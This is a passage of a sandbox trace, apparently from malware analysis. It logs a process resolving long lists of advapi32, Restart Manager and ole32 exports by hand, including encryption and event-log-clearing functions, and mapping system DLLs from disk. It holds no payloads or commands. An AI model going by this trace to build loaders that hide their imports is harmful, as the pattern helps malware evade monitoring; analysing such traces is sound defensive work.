lpProcName="CryptReleaseContext") returned 0x7771e124 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetHashParam") returned 0x77753248 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetKeyParam") returned 0x777377b3 [0055.358] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetProvParam") returned 0x77753258 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetProviderA") returned 0x77753268 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetProviderExA") returned 0x77753278 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetProviderExW") returned 0x77753288 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSetProviderW") returned 0x77753298 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSignHashA") returned 0x777532a8 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptSignHashW") returned 0x777532b8 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptVerifySignatureA") returned 0x777532c8 [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="CryptVerifySignatureW") returned 0x7771c54a [0055.359] GetProcAddress (hModule=0x77710000, lpProcName="DecryptFileA") returned 0x77752d75 [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DecryptFileW") returned 0x7775283b [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DeleteAce") returned 0x777242ec [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DestroyPrivateObjectSecurity") returned 0x7771f471 [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateEncryptionInfoFile") returned 0x77752ae4 [0055.360] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateToken") returned 0x7771c7e6 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfBackupEventLogFileA") returned 0x77775049 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfBackupEventLogFileW") returned 0x77774b79 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfChangeNotify") returned 0x77774929 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfClearEventLogFileA") returned 0x77774fa1 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfClearEventLogFileW") returned 0x77774ad1 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfCloseEventLog") returned 0x777177e4 [0055.361] GetProcAddress (hModule=0x77710000, lpProcName="ElfDeregisterEventSource") returned 0x777235fe [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfFlushEventLog") returned 0x77775201 [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfNumberOfRecords") returned 0x777747b9 [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfOldestRecord") returned 0x77774871 [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfOpenBackupEventLogA") returned 0x77774eb1 [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfOpenBackupEventLogW") returned 0x777749e1 [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfOpenEventLogA") returned 0x77774d3e [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfOpenEventLogW") returned 0x7771763e [0055.362] GetProcAddress (hModule=0x77710000, lpProcName="ElfReadEventLogA") returned 0x77775101 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfReadEventLogW") returned 0x77774c31 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfRegisterEventSourceA") returned 0x77722d8d [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfRegisterEventSourceW") returned 0x77722629 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfReportEventA") returned 0x77714019 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfReportEventAndSourceW") returned 0x77774d31 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="ElfReportEventW") returned 0x7771c96a [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="EnableTrace") returned 0x7771fcda [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="EnableTraceEx") returned 0x7771fc60 [0055.363] GetProcAddress (hModule=0x77710000, lpProcName="EnableTraceEx2") returned 0x7771fa81 [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EncryptFileA") returned 0x77752cd8 [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EncryptFileW") returned 0x777527ec [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EncryptedFileKeyInfo") returned 0x77752b53 [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EncryptionDisable") returned 0x77752b27 [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EnumDependentServicesA") returned 0x77772104 [0055.364] GetProcAddress (hModule=0x77710000, lpProcName="EnumDependentServicesW") returned 0x77711e3a [0055.369] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.369] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.369] GetModuleFileNameW (in: hModule=0x753b0000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Rstrtmgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll")) returned 0x20 [0055.369] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.370] CreateFileW (lpFileName="C:\\Windows\\system32\\Rstrtmgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0055.370] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.370] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.370] GetFileSize (in: hFile=0x15c, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x25200 [0055.370] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.370] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x160 [0055.370] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.370] MapViewOfFile (hFileMappingObject=0x160, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25200) returned 0x2880000 [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmAddFilter") returned 0x753b44bc [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmCancelCurrentTask") returned 0x753b4469 [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmEndSession") returned 0x753b4979 [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmGetFilterList") returned 0x753b4581 [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmGetList") returned 0x753b435b [0055.372] GetProcAddress (hModule=0x753b0000, lpProcName="RmJoinSession") returned 0x753b486e [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmRegisterResources") returned 0x753b42f6 [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmRemoveFilter") returned 0x753b4520 [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmReserveHeap") returned 0x753b3c3c [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmRestart") returned 0x753b4413 [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmShutdown") returned 0x753b43ba [0055.373] GetProcAddress (hModule=0x753b0000, lpProcName="RmStartSession") returned 0x753b474b [0055.373] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0055.374] GetModuleFileNameW (in: hModule=0x76620000, lpFilename=0x18efd8, nSize=0x104 | out: lpFilename="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0055.374] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0055.374] CreateFileW (lpFileName="C:\\Windows\\syswow64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0055.374] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0055.374] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0055.374] GetFileSize (in: hFile=0x164, lpFileSizeHigh=0x18efcc | out: lpFileSizeHigh=0x18efcc*=0x0) returned 0x159400 [0055.375] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0055.375] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x168 [0055.375] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0055.375] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x159400) returned 0x3380000 [0055.381] GetProcAddress (hModule=0x76620000, lpProcName=0x33cc256) returned 0x7662c6a7 [0055.382] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserFree") returned 0x7671a976 [0055.384] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserMarshal") returned 0x766da9ac [0055.384] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserSize") returned 0x766da764 [0055.385] GetProcAddress (hModule=0x76620000, lpProcName="CLIPFORMAT_UserUnmarshal") returned 0x766dad33 [0055.385] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromOle1Class") returned 0x766453c1 [0055.386] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgID") returned 0x7664503c [0055.386] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0055.386] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromString") returned 0x7663e599 [0055.387] GetProcAddress (hModule=0x76620000, lpProcName="CoAddRefServerProcess") returned 0x76683cf3 [0055.389] GetProcAddress (hModule=0x76620000, lpProcName="CoAllowSetForegroundWindow") returned 0x7663b51e [0055.390] GetProcAddress (hModule=0x76620000, lpProcName="CoBuildVersion") returned 0x766953ae [0055.390] GetProcAddress (hModule=0x76620000, lpProcName="CoCancelCall") returned 0x766f201a [0055.391] GetProcAddress (hModule=0x76620000, lpProcName="CoCopyProxy") returned 0x76635f47 [0055.391] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateFreeThreadedMarshaler") returned 0x7663e452 [0055.392] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateGuid") returned 0x766615d5 [0055.392] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0055.393] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstanceEx") returned 0x76669d4e [0055.393] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateObjectInContext") returned 0x766f3f6b [0055.393] GetProcAddress (hModule=0x76620000, lpProcName="CoDeactivateObject") returned 0x766f1937 [0055.394] GetProcAddress (hModule=0x76620000, lpProcName="CoDisableCallCancellation") returned 0x7663d313 [0055.395] GetProcAddress (hModule=0x76620000, lpProcName="CoDisconnectContext") returned 0x76700a01 [0055.396] GetProcAddress (hModule=0x76620000, lpProcName="CoDisconnectObject") returned 0x7663e604 [0055.396] GetProcAddress (hModule=0x76620000, lpProcName="CoDosDateTimeToFileTime") returned 0x767078c9 [0055.397] GetProcAddress (hModule=0x76620000, lpProcName="CoEnableCallCancellation") returned 0x7663d2dc [0055.397] GetProcAddress (hModule=0x76620000, lpProcName="CoFileTimeNow") returned 0x76694284 [0055.398] GetProcAddress (hModule=0x76620000, lpProcName="CoFileTimeToDosDateTime") returned 0x76707875 [0055.398] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeAllLibraries") returned 0x7665dec9 [0055.398] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeLibrary") returned 0x76700f36 [0055.399] GetProcAddress (hModule=0x76620000, lpProcName="CoFreeUnusedLibrariesEx") returned 0x7666b661 [0055.400] GetProcAddress (hModule=0x76620000, lpProcName="CoGetActivationState") returned 0x766f173a [0055.400] GetProcAddress (hModule=0x76620000, lpProcName="CoGetApartmentID") returned 0x766f553a [0055.400] GetProcAddress (hModule=0x76620000, lpProcName="CoGetApartmentType") returned 0x76666551 [0055.401] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallContext") returned 0x7663b385 [0055.401] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallState") returned 0x766f16f3 [0055.401] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCallerTID") returned 0x766ef763 [0055.401] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCancelObject") returned 0x766f1f44 [0055.402] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0055.402] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassVersion") returned 0x766ef5d9 [0055.402] GetProcAddress (hModule=0x76620000, lpProcName="CoGetComCatalog") returned 0x76665d65 [0055.403] GetProcAddress (hModule=0x76620000, lpProcName="CoGetContextToken") returned 0x7665ecab [0055.403] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCurrentLogicalThreadId") returned 0x766af66e [0055.404] GetProcAddress (hModule=0x76620000, lpProcName="CoGetCurrentProcess") returned 0x766996f9 [0055.404] GetProcAddress (hModule=0x76620000, lpProcName="CoGetDefaultContext") returned 0x766af0c9 [0055.405] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInstanceFromFile") returned 0x766e340b [0055.405] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInstanceFromIStorage") returned 0x76700f07 [0055.406] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterceptor") returned 0x7670c71d [0055.407] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterceptorFromTypeInfo") returned 0x7662a7d6 [0055.407] GetProcAddress (hModule=0x76620000, lpProcName="CoGetInterfaceAndReleaseStream") returned 0x7664418c [0055.407] GetProcAddress (hModule=0x76620000, lpProcName="CoGetMalloc") returned 0x76666265 [0055.408] GetProcAddress (hModule=0x76620000, lpProcName="CoGetMarshalSizeMax") returned 0x7664f1eb [0055.408] GetProcAddress (hModule=0x76620000, lpProcName="CoGetModuleType") returned 0x76704d5a [0055.409] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObject") returned 0x7667b68d [0055.409] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObjectContext") returned 0x7666632b [0055.409] GetProcAddress (hModule=0x76620000, lpProcName="CoGetPSClsid") returned 0x766426b9 [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoGetProcessIdentifier") returned 0x766f169e [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoGetStandardMarshal") returned 0x766995f0 [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoGetStdMarshalEx") returned 0x766f17c2 [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoGetSystemSecurityPermissions") returned 0x766f16c9 [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoGetTreatAsClass") returned 0x7664a72f [0055.410] GetProcAddress (hModule=0x76620000, lpProcName="CoImpersonateClient") returned 0x7662fed0 [0055.411] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0055.411] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0055.411] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0055.411] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeWOW") returned 0x766e1104 [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoInstall") returned 0x76701007 [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoInvalidateRemoteMachineBindings") returned 0x766f1656 [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoIsHandlerConnected") returned 0x766e39b5 [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoIsOle1Class") returned 0x7668186a [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoLoadLibrary") returned 0x766942dc [0055.412] GetProcAddress (hModule=0x76620000, lpProcName="CoLockObjectExternal") returned 0x766ae871 [0055.413] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalHresult") returned 0x766ef73e [0055.413] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalInterThreadInterfaceInStream") returned 0x7664405d [0055.413] GetProcAddress (hModule=0x76620000, lpProcName="CoMarshalInterface") returned 0x7664ef03 [0055.413] GetProcAddress (hModule=0x76620000, lpProcName="CoPopServiceDomain") returned 0x766f635e [0055.414] GetProcAddress (hModule=0x76620000, lpProcName="CoPushServiceDomain") returned 0x766f6323 [0055.414] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryAuthenticationServices") returned 0x766f2a11 [0055.414] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryClientBlanket") returned 0x766246ee [0055.414] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryProxyBlanket") returned 0x76656224 [0055.414] GetProcAddress (hModule=0x76620000, lpProcName="CoQueryReleaseObject") returned 0x766effdb [0055.415] GetProcAddress (hModule=0x76620000, lpProcName="CoReactivateObject") returned 0x766f15de [0055.415] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterChannelHook") returned 0x7664dfb1 [0055.415] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterClassObject") returned 0x766321e1 [0055.415] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterInitializeSpy") returned 0x76667660 [0055.416] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterMallocSpy") returned 0x766f04f7 [0055.416] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterMessageFilter") returned 0x766565f9 [0055.416] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterPSClsid") returned 0x7662c56e [0055.416] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterSurrogate") returned 0x767009bf [0055.416] GetProcAddress (hModule=0x76620000, lpProcName="CoRegisterSurrogateEx") returned 0x7663a789 [0055.417] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseMarshalData") returned 0x7663bc22 [0055.417] GetProcAddress (hModule=0x76620000, lpProcName="CoReleaseServerProcess") returned 0x76684314 [0055.417] GetProcAddress (hModule=0x76620000, lpProcName="CoResumeClassObjects") returned 0x7662ea02 [0055.417] GetProcAddress (hModule=0x76620000, lpProcName="CoRetireServer") returned 0x766f167a [0055.417] GetProcAddress (hModule=0x76620000, lpProcName="CoRevertToSelf") returned 0x76630065 [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeClassObject") returned 0x766aeacf [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeInitializeSpy") returned 0x76669784 [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoRevokeMallocSpy") returned 0x766f0081 [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoSetCancelObject") returned 0x766f2104 [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoSetProxyBlanket") returned 0x76635ea5 [0055.418] GetProcAddress (hModule=0x76620000, lpProcName="CoSetState") returned 0x76662705 [0055.420] GetProcAddress (hModule=0x76620000, lpProcName="CoSuspendClassObjects") returned 0x7668bb02 [0055.420] GetProcAddress (hModule=0x76620000, lpProcName="CoSwitchCallContext") returned 0x7663009c [0055.421] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemAlloc") returned 0x7666ea4c [0055.421] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemFree") returned 0x76676f41 [0055.421] GetProcAddress (hModule=0x76620000, lpProcName="CoTaskMemRealloc") returned 0x7665ee39 [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoTestCancel") returned 0x766f205a [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoTreatAsClass") returned 0x766efc51 [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoUnloadingWOW") returned 0x766e118b [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoUnmarshalHresult") returned 0x766e1158 [0055.422] GetProcAddress (hModule=0x76620000, lpProcName="CoUnmarshalInterface") returned 0x7664f150 [0055.423] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfCheckThreadState") returned 0x766fe27f [0055.423] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfGetThreadState") returned 0x766fdec5 [0055.424] GetProcAddress (hModule=0x76620000, lpProcName="CoVrfReleaseThreadState") returned 0x766fde43 [0055.424] GetProcAddress (hModule=0x76620000, lpProcName="CoWaitForMultipleHandles") returned 0x7663617a [0055.424] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllCanUnloadNow") returned 0x766625a1 [0055.424] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllGetClassObject") returned 0x7670c883 [0055.424] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllRegisterProxy") returned 0x7670cf23 [0055.425] GetProcAddress (hModule=0x76620000, lpProcName="ComPs_NdrDllUnregisterProxy") returned 0x7670cf47 [0055.425] GetProcAddress (hModule=0x76620000, lpProcName="CreateAntiMoniker") returned 0x766e9aca [0055.425] GetProcAddress (hModule=0x76620000, lpProcName="CreateBindCtx") returned 0x76666d2c [0055.425] GetProcAddress (hModule=0x76620000, lpProcName="CreateClassMoniker") returned 0x76684b60 [0055.426] GetProcAddress (hModule=0x76620000, lpProcName="CreateDataAdviseHolder") returned 0x7669de5b [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateDataCache") returned 0x766a0a0a [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateErrorInfo") returned 0x76632bda [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateFileMoniker") returned 0x766a2bf2 [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateGenericComposite") returned 0x7668492e [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateILockBytesOnHGlobal") returned 0x7668c0b2 [0055.428] GetProcAddress (hModule=0x76620000, lpProcName="CreateItemMoniker") returned 0x766adda2 [0055.429] GetProcAddress (hModule=0x76620000, lpProcName="CreateObjrefMoniker") returned 0x766e9b07 [0055.429] GetProcAddress (hModule=0x76620000, lpProcName="CreateOleAdviseHolder") returned 0x7669bbde [0055.429] GetProcAddress (hModule=0x76620000, lpProcName="CreatePointerMoniker") returned 0x7662d5f6 [0055.430] GetProcAddress (hModule=0x76620000, lpProcName="CreateStdProgressIndicator") returned 0x766ebec3 [0055.430] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0055.430] GetProcAddress (hModule=0x76620000, lpProcName="DcomChannelSetHResult") returned 0x76678c0b [0055.431] GetProcAddress (hModule=0x76620000, lpProcName="DllDebugObjectRPCHook") returned 0x7675f66f [0055.431] GetProcAddress (hModule=0x76620000, lpProcName="DllGetClassObject") returned 0x76646a49 [0055.432] GetProcAddress (hModule=0x76620000, lpProcName="DllGetClassObjectWOW") returned 0x76646a49 [0055.432] GetProcAddress (hModule=0x76620000, lpProcName="DllRegisterServer") returned 0x766eff7f [0055.432] GetProcAddress (hModule=0x76620000, lpProcName="DoDragDrop") returned 0x7672a827 [0055.434] GetProcAddress (hModule=0x76620000, lpProcName="EnableHookObject") returned 0x766f0cb6 [0055.435] GetProcAddress (hModule=0x76620000, lpProcName="FmtIdToPropStgName") returned 0x7673aab1 [0055.436] GetProcAddress (hModule=0x76620000, lpProcName="FreePropVariantArray") returned 0x76632d6d [0055.436] GetProcAddress (hModule=0x76620000, lpProcName="GetClassFile") returned 0x766ec090 [0055.437] GetProcAddress (hModule=0x76620000, lpProcName="GetConvertStg") returned 0x76724db6 [0055.437] GetProcAddress (hModule=0x76620000, lpProcName="GetDocumentBitStg") returned 0x76724d63 [0055.437] GetProcAddress (hModule=0x76620000, lpProcName="GetErrorInfo") returned 0x7665ecdc [0055.438] GetProcAddress (hModule=0x76620000, lpProcName="GetHGlobalFromILockBytes") returned 0x766e2747 [0055.438] GetProcAddress (hModule=0x76620000, lpProcName="GetHGlobalFromStream") returned 0x766441d5 [0055.438] GetProcAddress (hModule=0x76620000, lpProcName="GetHookInterface") returned 0x766f0734 [0055.438] GetProcAddress (hModule=0x76620000, lpProcName="GetRunningObjectTable") returned 0x766adb21 [0055.438] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserFree") returned 0x7675f77c [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserMarshal") returned 0x7675f849 [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserSize") returned 0x7675f806 [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HACCEL_UserUnmarshal") returned 0x7675f784 [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserFree") returned 0x76685443 [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserMarshal") returned 0x766853a5 [0055.439] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserSize") returned 0x76685345 [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HBITMAP_UserUnmarshal") returned 0x7668546d [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserFree") returned 0x7675f77c [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserMarshal") returned 0x7675f849 [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserSize") returned 0x7675f806 [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HBRUSH_UserUnmarshal") returned 0x7675f784 [0055.440] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserFree") returned 0x7675f77c [0055.441] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserMarshal") returned 0x7675f849 [0055.441] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserSize") returned 0x7675f806 [0055.441] GetProcAddress (hModule=0x76620000, lpProcName="HDC_UserUnmarshal") returned 0x7675f784 [0055.444] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserFree") returned 0x76715af7 [0055.444] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserMarshal") returned 0x76715960 [0055.444] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserSize") returned 0x76715919 [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HENHMETAFILE_UserUnmarshal") returned 0x76715ab1 [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserFree") returned 0x766861ba [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserMarshal") returned 0x766860de [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserSize") returned 0x76686165 [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HGLOBAL_UserUnmarshal") returned 0x766861ee [0055.445] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserFree") returned 0x7675f77c [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserMarshal") returned 0x7675f849 [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserSize") returned 0x7675f806 [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HICON_UserUnmarshal") returned 0x7675f784 [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserFree") returned 0x7675f77c [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserMarshal") returned 0x7675f849 [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserSize") returned 0x7675f806 [0055.446] GetProcAddress (hModule=0x76620000, lpProcName="HMENU_UserUnmarshal") returned 0x7675f784 [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserFree") returned 0x767158b9 [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserMarshal") returned 0x766da843 [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserSize") returned 0x766da939 [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILEPICT_UserUnmarshal") returned 0x766da7fd [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserFree") returned 0x76715cd8 [0055.447] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserMarshal") returned 0x76715b68 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserSize") returned 0x76715b21 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HMETAFILE_UserUnmarshal") returned 0x76715c05 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserFree") returned 0x76685443 [0055.448] GetProcAddress (hModule=0x76620000, lpProcName="HPALETTE_UserMarshal") returned 0x76715d4a [0055.448] GetProcAddress 